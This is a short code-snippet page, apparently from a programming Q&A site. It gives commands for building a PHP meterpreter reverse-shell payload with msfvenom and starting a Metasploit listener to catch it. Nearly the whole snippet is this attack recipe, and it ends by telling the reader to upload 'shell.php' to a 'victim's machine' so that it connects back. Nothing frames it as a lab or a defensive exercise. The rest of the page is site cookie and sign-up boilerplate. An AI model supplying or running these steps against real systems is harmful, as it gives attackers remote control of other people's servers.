reverse php shell pentestmonkey

##This will create the payload file "shell.php" with your ip and port.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php
##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.
#Run 'msfconsole' to start the listener then run the following command.
use exploit/multi/handler 
set PAYLOAD php/meterpreter/reverse_tcp
#set your ipaddr
set LHOST <$LOCAL_IP>
#set your listening port
set LPORT <$LOCAL_PORT>
#"show options" to check ur steps then run the command "exploit"
exploit #this will start the listener
#Upload "shell.php" to your victim's machine.
#The victim's machine will need to run the file to connect back to your machine.

Are there any code examples left?
Made with love
This website uses cookies to make IQCode work for you. By using this site, you agree to our cookie policy

Welcome Back!

Sign up to unlock all of IQCode features:
  • Test your skills and track progress
  • Engage in comprehensive interactive courses
  • Commit to daily skill-enhancing challenges
  • Solve practical, real-world issues
  • Share your insights and learnings
Create an account
Sign in
Recover lost password
Or log in with

Create a Free Account

Sign up to unlock all of IQCode features:
  • Test your skills and track progress
  • Engage in comprehensive interactive courses
  • Commit to daily skill-enhancing challenges
  • Solve practical, real-world issues
  • Share your insights and learnings
Create an account
Sign up
Or sign up with
By signing up, you agree to the Terms and Conditions and Privacy Policy. You also agree to receive product-related marketing emails from IQCode, which you can unsubscribe from at any time.
Creating a new code example
Code snippet title
Source